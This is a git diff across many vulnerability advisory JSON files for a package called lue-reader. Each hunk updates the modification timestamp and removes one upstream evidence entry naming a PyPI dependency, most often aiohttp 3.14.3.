@@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-53643.json b/advisories/BREW-lue-reader-CVE-2025-53643.json index 1e26d6b49dc..715516a6032 100644 --- a/advisories/BREW-lue-reader-CVE-2025-53643.json +++ b/advisories/BREW-lue-reader-CVE-2025-53643.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-53643", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-9548-qrrj-x5pj", "CVE-2025-53643", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69223.json b/advisories/BREW-lue-reader-CVE-2025-69223.json index 33646555d4f..280725fa410 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69223.json +++ b/advisories/BREW-lue-reader-CVE-2025-69223.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69223", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-6mq8-rvhq-8wgg", "CVE-2025-69223", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69224.json b/advisories/BREW-lue-reader-CVE-2025-69224.json index ae88a338035..2c4c2c0c6ce 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69224.json +++ b/advisories/BREW-lue-reader-CVE-2025-69224.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69224", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-69f9-5gxw-wvc2", "CVE-2025-69224", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69225.json b/advisories/BREW-lue-reader-CVE-2025-69225.json index 65bf555b33d..9df6c5f0d8f 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69225.json +++ b/advisories/BREW-lue-reader-CVE-2025-69225.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69225", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mqqc-3gqh-h2x8", "CVE-2025-69225", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69226.json b/advisories/BREW-lue-reader-CVE-2025-69226.json index 83c74f80d79..be360367f10 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69226.json +++ b/advisories/BREW-lue-reader-CVE-2025-69226.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69226", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-54jq-c3m8-4m76", "CVE-2025-69226", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69227.json b/advisories/BREW-lue-reader-CVE-2025-69227.json index 081fc38c85b..f1ae5f9e963 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69227.json +++ b/advisories/BREW-lue-reader-CVE-2025-69227.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69227", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jj3x-wxrx-4x23", "CVE-2025-69227", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69228.json b/advisories/BREW-lue-reader-CVE-2025-69228.json index dc56e4a2d01..d762c22cb5a 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69228.json +++ b/advisories/BREW-lue-reader-CVE-2025-69228.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69228", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-6jhg-hg63-jvvf", "CVE-2025-69228", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69229.json b/advisories/BREW-lue-reader-CVE-2025-69229.json index d6c096b030f..0dc48f9a1f8 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69229.json +++ b/advisories/BREW-lue-reader-CVE-2025-69229.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69229", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-g84x-mcqj-x9qq", "CVE-2025-69229", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69230.json b/advisories/BREW-lue-reader-CVE-2025-69230.json index f59db7212db..f33341eee4d 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69230.json +++ b/advisories/BREW-lue-reader-CVE-2025-69230.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69230", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-fh55-r93g-j68g", "CVE-2025-69230", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2025-69534.json b/advisories/BREW-lue-reader-CVE-2025-69534.json index 7503ce94df9..17c5495aeac 100644 --- a/advisories/BREW-lue-reader-CVE-2025-69534.json +++ b/advisories/BREW-lue-reader-CVE-2025-69534.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2025-69534", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5wmx-573v-2qwq", "CVE-2025-69534", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown", - "subject_version": "3.10.3", - "key": "pkg:pypi/markdown@3.10.3", - "resource": "markdown" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-22815.json b/advisories/BREW-lue-reader-CVE-2026-22815.json index 67cbf7b9de3..9d4bec36eb2 100644 --- a/advisories/BREW-lue-reader-CVE-2026-22815.json +++ b/advisories/BREW-lue-reader-CVE-2026-22815.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-22815", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-w2fm-2cpv-w7v5", "CVE-2026-22815", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34513.json b/advisories/BREW-lue-reader-CVE-2026-34513.json index 7a4549837ba..5b63f947ab4 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34513.json +++ b/advisories/BREW-lue-reader-CVE-2026-34513.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34513", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hcc4-c3v8-rx92", "CVE-2026-34513", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34514.json b/advisories/BREW-lue-reader-CVE-2026-34514.json index f9b6af5c855..09be60738ee 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34514.json +++ b/advisories/BREW-lue-reader-CVE-2026-34514.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34514", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-2vrm-gr82-f7m5", "CVE-2026-34514", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34515.json b/advisories/BREW-lue-reader-CVE-2026-34515.json index 06efbb18cfb..b7d1f1af847 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34515.json +++ b/advisories/BREW-lue-reader-CVE-2026-34515.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34515", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-p998-jp59-783m", "CVE-2026-34515", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34516.json b/advisories/BREW-lue-reader-CVE-2026-34516.json index 44f1aa42bf3..8fe79d8b237 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34516.json +++ b/advisories/BREW-lue-reader-CVE-2026-34516.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34516", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-m5qp-6w8w-w647", "CVE-2026-34516", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34517.json b/advisories/BREW-lue-reader-CVE-2026-34517.json index c1627a0591d..81356bef389 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34517.json +++ b/advisories/BREW-lue-reader-CVE-2026-34517.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34517", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-3wq7-rqq7-wx6j", "CVE-2026-34517", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34518.json b/advisories/BREW-lue-reader-CVE-2026-34518.json index a06efb3afc2..1decf3cf031 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34518.json +++ b/advisories/BREW-lue-reader-CVE-2026-34518.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34518", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-966j-vmvw-g2g9", "CVE-2026-34518", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34519.json b/advisories/BREW-lue-reader-CVE-2026-34519.json index 620f1168ec9..e0b18461946 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34519.json +++ b/advisories/BREW-lue-reader-CVE-2026-34519.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34519", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-mwh4-6h8g-pg8w", "CVE-2026-34519", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34520.json b/advisories/BREW-lue-reader-CVE-2026-34520.json index 14dee6e79ab..ce5ef20f988 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34520.json +++ b/advisories/BREW-lue-reader-CVE-2026-34520.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34520", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-63hf-3vf5-4wqf", "CVE-2026-34520", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34525.json b/advisories/BREW-lue-reader-CVE-2026-34525.json index ababd3f576e..c3f2314547c 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34525.json +++ b/advisories/BREW-lue-reader-CVE-2026-34525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34525", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-c427-h43c-vf67", "CVE-2026-34525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-34993.json b/advisories/BREW-lue-reader-CVE-2026-34993.json index ea37bba5545..7e46fdb4215 100644 --- a/advisories/BREW-lue-reader-CVE-2026-34993.json +++ b/advisories/BREW-lue-reader-CVE-2026-34993.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-34993", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-jg22-mg44-37j8", "CVE-2026-34993", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-41066.json b/advisories/BREW-lue-reader-CVE-2026-41066.json index cf20c16615e..8168a618712 100644 --- a/advisories/BREW-lue-reader-CVE-2026-41066.json +++ b/advisories/BREW-lue-reader-CVE-2026-41066.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-41066", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-vfmq-68hx-4jfw", "CVE-2026-41066", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "lxml", - "subject_version": "6.1.1", - "key": "pkg:pypi/lxml@6.1.1", - "resource": "lxml" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-4539.json b/advisories/BREW-lue-reader-CVE-2026-4539.json index f5880993a06..ae478cf1792 100644 --- a/advisories/BREW-lue-reader-CVE-2026-4539.json +++ b/advisories/BREW-lue-reader-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-4539", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-45409.json b/advisories/BREW-lue-reader-CVE-2026-45409.json index 321bdd4d798..83039734623 100644 --- a/advisories/BREW-lue-reader-CVE-2026-45409.json +++ b/advisories/BREW-lue-reader-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-45409", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-47265.json b/advisories/BREW-lue-reader-CVE-2026-47265.json index 4df48ff1f74..7d0cca1d16a 100644 --- a/advisories/BREW-lue-reader-CVE-2026-47265.json +++ b/advisories/BREW-lue-reader-CVE-2026-47265.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-47265", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hg6j-4rv6-33pg", "CVE-2026-47265", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-50269.json b/advisories/BREW-lue-reader-CVE-2026-50269.json index 5752ae119ef..e816f5864e0 100644 --- a/advisories/BREW-lue-reader-CVE-2026-50269.json +++ b/advisories/BREW-lue-reader-CVE-2026-50269.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-50269", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-m6qw-4cw2-hm4m", "CVE-2026-50269", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54273.json b/advisories/BREW-lue-reader-CVE-2026-54273.json index e02e3370b71..a6aff695ada 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54273.json +++ b/advisories/BREW-lue-reader-CVE-2026-54273.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54273", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-4fvr-rgm6-gqmc", "CVE-2026-54273", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54274.json b/advisories/BREW-lue-reader-CVE-2026-54274.json index 0d148ea910d..22b156aaf97 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54274.json +++ b/advisories/BREW-lue-reader-CVE-2026-54274.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54274", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-xcgm-r5h9-7989", "CVE-2026-54274", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54275.json b/advisories/BREW-lue-reader-CVE-2026-54275.json index 47fc4ef7195..5efb20b7828 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54275.json +++ b/advisories/BREW-lue-reader-CVE-2026-54275.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54275", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-4m7w-qmgq-4wj5", "CVE-2026-54275", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54276.json b/advisories/BREW-lue-reader-CVE-2026-54276.json index b7948cbc315..95d3e24b901 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54276.json +++ b/advisories/BREW-lue-reader-CVE-2026-54276.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54276", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-hpj7-wq8m-9hgp", "CVE-2026-54276", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54277.json b/advisories/BREW-lue-reader-CVE-2026-54277.json index acb70c0b8f2..8f02af4611c 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54277.json +++ b/advisories/BREW-lue-reader-CVE-2026-54277.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54277", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-63hw-fmq6-xxg2", "CVE-2026-54277", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54278.json b/advisories/BREW-lue-reader-CVE-2026-54278.json index f5390af1f3f..94d48218e43 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54278.json +++ b/advisories/BREW-lue-reader-CVE-2026-54278.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54278", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-g3cq-j2xw-wf74", "CVE-2026-54278", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54279.json b/advisories/BREW-lue-reader-CVE-2026-54279.json index 1db7458c508..373dacc1af0 100644 --- a/advisories/BREW-lue-reader-CVE-2026-54279.json +++ b/advisories/BREW-lue-reader-CVE-2026-54279.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-lue-reader-CVE-2026-54279", "published": "2026-08-13T17:03:07Z", - "modified": "2026-08-13T17:03:07Z", + "modified": "2026-09-10T19:43:26Z", "upstream": [ "GHSA-2fqr-mr3j-6wp8", "CVE-2026-54279", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "aiohttp", - "subject_version": "3.14.3", - "key": "pkg:pypi/aiohttp@3.14.3", - "resource": "aiohttp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-lue-reader-CVE-2026-54280.json b/advisories/BREW-lue-reader-CVE-2026-54280.json index 1d40a3255aa..ed5f93f436e 100644 --- 